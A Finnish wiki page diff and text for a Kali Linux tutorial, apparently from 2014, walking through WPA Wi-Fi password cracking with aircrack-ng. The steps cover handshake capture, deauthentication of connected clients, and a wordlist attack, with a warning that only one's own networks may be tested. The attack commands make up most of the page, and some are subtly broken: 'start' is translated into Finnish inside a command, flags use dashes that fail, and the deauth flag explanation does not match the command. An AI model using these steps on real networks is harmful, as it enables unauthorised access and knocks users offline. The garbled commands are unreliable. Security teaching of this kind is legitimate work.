Ero sivun ”Kali Linux” versioiden välillä
Rivi 34: | Rivi 34: | ||
4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle. | 4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle. | ||
− | airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0 | + | airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0 |
* bssid = MAC osoite tukiasemasta | * bssid = MAC osoite tukiasemasta | ||
Rivi 41: | Rivi 41: | ||
Koska ei jakseta odottaa kokopäivää että joku muodostaa uudelleen yhteyttä tukiasemalle, lähetämme tukiasemalle "Katkaise yhteys" paketteja: | Koska ei jakseta odottaa kokopäivää että joku muodostaa uudelleen yhteyttä tukiasemalle, lähetämme tukiasemalle "Katkaise yhteys" paketteja: | ||
− | aireplay-ng | + | aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0 |
* --deauth 100 = Katkaise yhteys 100 kertaa | * --deauth 100 = Katkaise yhteys 100 kertaa | ||
− | * | + | * –a 00:14:BF:E0:E8:D5 = BSSID tukiasemasta |
+ | * –c 4C:EB:42:59:DE:31 = BSSID asiakaslaitteesta | ||
+ | |||
+ | Jos virhe | ||
+ | |||
+ | Waiting for beacon frame (BSSID: 00:**:**:**:**:**) on channel -1 | ||
+ | Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch | ||
+ | |||
+ | aja komento (sammuta palvelu) | ||
+ | |||
+ | /etc/init.d/network-manager stop | ||
5. Aletaan siis se oikea murtaminen. | 5. Aletaan siis se oikea murtaminen. | ||
Rivi 52: | Rivi 62: | ||
Esimerkiksi: | Esimerkiksi: | ||
− | aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/ | + | aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap |
* WPAcrack-01.cap = Tiedosto jossa on hash salasanasta | * WPAcrack-01.cap = Tiedosto jossa on hash salasanasta |
Versio 31. lokakuuta 2014 kello 19.43
Kali Linux on Debianiin perustuva paketti, joka on tarkoitettu rikosteknisen tutkimiseen ja läpäisytesteihin.
Kali Linux sisältää esimerkiksi salasanan murto-ohjelman ja WLAN salauksen murtoon aircrack-ng.
Teksti: Wikipedia
Sisällysluettelo
Asennus
Lataa Kali Linux http://www.kali.org/downloads/, suosittelemme torrent latausta, sillä paljon nopeampi kuin Direct.
Asentaminen on samanlaista kuin Debianin asennus
Paketit
Lista paketeista joita voit käyttää tietoturvan testauksessa. Ohjeiden ideoina on kuvastaa kuinka yksinkertaista on murtautua erilaisiin järjestelmiin ja se että pitää suojautua mahdollisimman hyvin.
HUOM! Omiin järjestelmiin murtautuminen sallittua. Luvattomat tietomurrot ovat Suomen laissa kiellettyjä!
aircrack-ng
Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.
1. Avataan root terminaali
2. Määritetään langaton verkkokortti
airmon-ng aloittaa wlan0
3. Tämä komento listaa kaikki lähialueen WLAN-verkot
airodump-ng mon0
4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle.
airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
- bssid = MAC osoite tukiasemasta
- write WPAcrack = Hakemistoon jonne kirjoitetaan -> Eli kotikansiosi juureen
Koska ei jakseta odottaa kokopäivää että joku muodostaa uudelleen yhteyttä tukiasemalle, lähetämme tukiasemalle "Katkaise yhteys" paketteja:
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
- --deauth 100 = Katkaise yhteys 100 kertaa
- –a 00:14:BF:E0:E8:D5 = BSSID tukiasemasta
- –c 4C:EB:42:59:DE:31 = BSSID asiakaslaitteesta
Jos virhe
Waiting for beacon frame (BSSID: 00:**:**:**:**:**) on channel -1 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
aja komento (sammuta palvelu)
/etc/init.d/network-manager stop
5. Aletaan siis se oikea murtaminen.
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] source/*.cap
Esimerkiksi:
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
- WPAcrack-01.cap = Tiedosto jossa on hash salasanasta
- /usr/share/wordlist/* = polku salasana tiedostoon
Sitten vain odotetaan että hash on purettu